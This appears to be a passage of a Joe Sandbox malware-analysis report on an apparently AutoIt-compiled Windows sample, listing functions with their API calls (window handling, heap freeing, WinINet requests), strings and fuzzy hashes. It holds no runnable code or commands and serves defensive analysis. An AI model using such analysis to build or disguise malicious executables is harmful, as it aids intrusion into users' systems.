                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                              • String ID:
                                              • API String ID: 2156557900-0
                                              • Opcode ID: 46f4a954325f024540f3d7ecbcc39f7989d31ee1dc9e5263fe57e1e136e41772
                                              • Instruction ID: 9d379e88bfd384f4162ba33a38f29432ae4e04e91a09ec43c836cfccde873154
                                              • Opcode Fuzzy Hash: 46f4a954325f024540f3d7ecbcc39f7989d31ee1dc9e5263fe57e1e136e41772
                                              • Instruction Fuzzy Hash: 4131E576500204FFDB209F25EC84B6D7B7ABB11769F254207F901E6250C77199898F34
                                              Function 00DA2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00DA2C94
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DA2CA0
                                              • _free.LIBCMT ref: 00DA2CAB
                                              • _free.LIBCMT ref: 00DA2CB6
                                              • _free.LIBCMT ref: 00DA2CC1
                                              • _free.LIBCMT ref: 00DA2CCC
                                              • _free.LIBCMT ref: 00DA2CD7
                                              • _free.LIBCMT ref: 00DA2CE2
                                              • _free.LIBCMT ref: 00DA2CED
                                              • _free.LIBCMT ref: 00DA2CFB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 58a1d302e7ee0bcd7dbc18fbcaa18d273defff27e43d18ebfe112fdb8d3dadab
                                              • Instruction ID: 8258b3dce0dab5e27abdbe8ebf373276700c42bf53359eedb3b2b4291545d4a0
                                              • Opcode Fuzzy Hash: 58a1d302e7ee0bcd7dbc18fbcaa18d273defff27e43d18ebfe112fdb8d3dadab
                                              • Instruction Fuzzy Hash: 45119676140108AFCB42EF5AD842CEE3BA5FF06750F4144A5FA485B222D731EA509FB1
                                              Function 00D71410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D71459
                                              • OleUninitialize.OLE32(?,00000000), ref: 00D714F8
                                              • UnregisterHotKey.USER32(?), ref: 00D716DD
                                              • DestroyWindow.USER32(?), ref: 00DB24B9
                                              • FreeLibrary.KERNEL32(?), ref: 00DB251E
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DB254B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: df5ebdbfb87fd5bc1d119b4808cc37fbc64b45c1c139e273d84d8ceff68e852e
                                              • Instruction ID: 1ababd6f6609ac7d78e1f14973f60a13f2ca30d93d3697a5c6889a8dbffea67d
                                              • Opcode Fuzzy Hash: df5ebdbfb87fd5bc1d119b4808cc37fbc64b45c1c139e273d84d8ceff68e852e
                                              • Instruction Fuzzy Hash: BCD16A35601212CFCB29EF19C895A69F7A0FF45700F24829DE54A6B251EB31ED52CF71
                                              Function 00D75BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 00D75C7A
                                                • Part of subcall function 00D75D0A: GetClientRect.USER32(?,?), ref: 00D75D30
                                                • Part of subcall function 00D75D0A: GetWindowRect.USER32(?,?), ref: 00D75D71
                                                • Part of subcall function 00D75D0A: ScreenToClient.USER32(?,?), ref: 00D75D99
                                              • GetDC.USER32 ref: 00DB46F5
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DB4708
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DB4716
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DB472B
                                              • ReleaseDC.USER32(?,00000000), ref: 00DB4733
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DB47C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: 43a55fa45a17ebb684d4f7beb54c04de7a696380a7db6433e71ab5fc04d1ef9e
                                              • Instruction ID: f8be2e61d033d7dd5da009bfbb23b7751934b962fe063467f3c466477efbe2f4
                                              • Opcode Fuzzy Hash: 43a55fa45a17ebb684d4f7beb54c04de7a696380a7db6433e71ab5fc04d1ef9e
                                              • Instruction Fuzzy Hash: FA71D335400205DFCF21CF64C985AFA7BB5FF4A310F284269E9566A166DB31D881DFB1
                                              Function 00DAAF88 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RtlDecodePointer.NTDLL(?), ref: 00DAAFAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: DecodePointer
                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                              • API String ID: 3527080286-3064271455
                                              • Opcode ID: 7fc724b8f4be837518842b5ed0a64cffd1c899e4754d677b325b82e289d95803
                                              • Instruction ID: 6da0ae679324a4ad15a48d804d5f9aef933d27253893e1fe4c7f8dba50ccb204
                                              • Opcode Fuzzy Hash: 7fc724b8f4be837518842b5ed0a64cffd1c899e4754d677b325b82e289d95803
                                              • Instruction Fuzzy Hash: 05517F74900609DFCF14DFA8E9481EDBBB0FF4B314F24028AE491B6265C7368966D779
                                              Function 00DE359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DE35E4
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • LoadStringW.USER32(00E42390,?,00000FFF,?), ref: 00DE360A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LoadString$_wcslen
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 4099089115-2391861430
                                              • Opcode ID: c16b5a9a1e5a7aaf9c7372809a30901768bea542d5dcbc1342384358762f4715
                                              • Instruction ID: c6d3e201933094b73c88fbe6e27abb10e64709f70a74ecc51053a33ee748a631
                                              • Opcode Fuzzy Hash: c16b5a9a1e5a7aaf9c7372809a30901768bea542d5dcbc1342384358762f4715
                                              • Instruction Fuzzy Hash: 7C518C72800249BACF15FBA1CC56EEEBB78EF14300F148165F109721A1EB316A99DF71
                                              Function 00DEC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC272
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC29A
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC2CA
                                              • GetLastError.KERNEL32 ref: 00DEC322
                                              • SetEvent.KERNEL32(?), ref: 00DEC336
                                              • InternetCloseHandle.WININET(00000000), ref: 00DEC341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: b1ceb47417e045f1776cd1489372c998ee21f73c361b32cc24ee6daef42dd4c8
                                              • Instruction ID: 0b066ca377c905f4cd55bdf84a3cd9eed769746c675c2dd35ebeab78bd2066a0
                                              • Opcode Fuzzy Hash: b1ceb47417e045f1776cd1489372c998ee21f73c361b32cc24ee6daef42dd4c8
                                              • Instruction Fuzzy Hash: C331C271510244AFD721AF66CC84A6B7BFCEB49744F18951EF486E3210DB31DD468B70
                                              Function 00DD989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DB3AAF,?,?,Bad directive syntax error,00E0CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00DD98BC
                                              • LoadStringW.USER32(00000000,?,00DB3AAF,?), ref: 00DD98C3
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DD9987
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 858772685-4153970271
                                              • Opcode ID: b02c85910db48763d4233f84b41e8bf904358be77b5975e5e226270d12070964
                                              • Instruction ID: bded4a6b09d0df0d964a9237db076dd6f3206df82fad6de0464aa96deb27e6d2
                                              • Opcode Fuzzy Hash: b02c85910db48763d4233f84b41e8bf904358be77b5975e5e226270d12070964
                                              • Instruction Fuzzy Hash: 94214F32800219BBCF15AFA0CC1AEEDB779FF18700F049456F519760A1EA719658DB71
                                              Function 00DD209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32 ref: 00DD20AB
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00DD20C0
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DD214D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1290815626-3381328864
                                              • Opcode ID: 620e13bdc041fdfdd8b2e31f290019242de65d88768b9b161a3239285854edeb
                                              • Instruction ID: f8111bb5c46f95b239b953ac0e0a7a103ae1c3eb99bf8d2330e8c81d0153629b
                                              • Opcode Fuzzy Hash: 620e13bdc041fdfdd8b2e31f290019242de65d88768b9b161a3239285854edeb
                                              • Instruction Fuzzy Hash: 751106776C8706B9FB112220EC0BDB677ACCF24724F205217FB44B52D2EE62A8469634
                                              Function 00DACE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                              • String ID:
                                              • API String ID: 1282221369-0
                                              • Opcode ID: 51ea79001cdb87927f5e34d9fd3b3225659016337dee275e32916cde911287cd
                                              • Instruction ID: a1fef5c4da08c0f389abbe750b30072baeb343ea18a86f1876aa5f181e9ba206
                                              • Opcode Fuzzy Hash: 51ea79001cdb87927f5e34d9fd3b3225659016337dee275e32916cde911287cd
                                              • Instruction Fuzzy Hash: 85613472D06300AFDF21AFB99881A7A7BA5EF07330F08416DFA55A7281D7319D0587B1
                                              Function 00D88BCD Relevance: 13.7, APIs: 9, Instructions: 168timeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D88F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D88BE8,?,00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88FC5
                                              • DestroyWindow.USER32(?), ref: 00D88C81
                                              • KillTimer.USER32(00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88D1B
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00DC6973
                                              • DeleteObject.GDI32(00000000), ref: 00DC69E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 2402799130-0
                                              • Opcode ID: 9c37e545d2a88695270ec64bec0e47726d1ab5380b63e5138edc37a8532d8d0d
                                              • Instruction ID: 332e3011917421c8fa9b6dbd880b7b742297cfcdb14191332f781a0fae3c45b6
                                              • Opcode Fuzzy Hash: 9c37e545d2a88695270ec64bec0e47726d1ab5380b63e5138edc37a8532d8d0d
                                              • Instruction Fuzzy Hash: A161AB34102601DFDB25AF26D948B2977F1FB81312F58455CE182AB5A4CB32E8C9EFB0
                                              Function 00E050D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E05186
                                              • ShowWindow.USER32(?,00000000), ref: 00E051C7
                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E051CD
                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E051D1
                                                • Part of subcall function 00E06FBA: DeleteObject.GDI32(00000000), ref: 00E06FE6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E0520D
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E0521A
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E0524D
                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E05287
                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E05296
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                              • String ID:
                                              • API String ID: 3210457359-0
                                              • Opcode ID: d3a9ffed24b09ba80ab2ed402bc010125edbd4d2b5c1fddb58318a62e786454b
                                              • Instruction ID: 8bd9449151f412685cf519974db13c3c2ec7a5229799d5b07b735150bad8d542
                                              • Opcode Fuzzy Hash: d3a9ffed24b09ba80ab2ed402bc010125edbd4d2b5c1fddb58318a62e786454b
                                              • Instruction Fuzzy Hash: 3B517932A41A09FEEB209F25CC4ABDA3BA5AF05324F246112F615B62E0C771A9C0DF51
                                              Function 00D88B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DC6890
                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DC68A9
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DC68B9
                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DC68D1
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DC68F2
                                              • DestroyCursor.USER32(00000000), ref: 00DC6901
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DC691E
                                              • DestroyCursor.USER32(00000000), ref: 00DC692D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                              • String ID:
                                              • API String ID: 3992029641-0
                                              • Opcode ID: b3350169339a83166cb9f7001535ea52874201a2a4a87466c1865865e1cb199c
                                              • Instruction ID: 982967ce99919524a015077d988a54f993393924c7c24f41ce50251a7b4ca892
                                              • Opcode Fuzzy Hash: b3350169339a83166cb9f7001535ea52874201a2a4a87466c1865865e1cb199c
                                              • Instruction Fuzzy Hash: AD51AB70600206AFDB20DF25CC91FAA7BB5FF88750F144618F956A72E0DB71E990DB60
                                              Function 00DEC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC182
                                              • GetLastError.KERNEL32 ref: 00DEC195
                                              • SetEvent.KERNEL32(?), ref: 00DEC1A9
                                                • Part of subcall function 00DEC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC272
                                                • Part of subcall function 00DEC253: GetLastError.KERNEL32 ref: 00DEC322
                                                • Part of subcall function 00DEC253: SetEvent.KERNEL32(?), ref: 00DEC336
                                                • Part of subcall function 00DEC253: InternetCloseHandle.WININET(00000000), ref: 00DEC341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 337547030-0
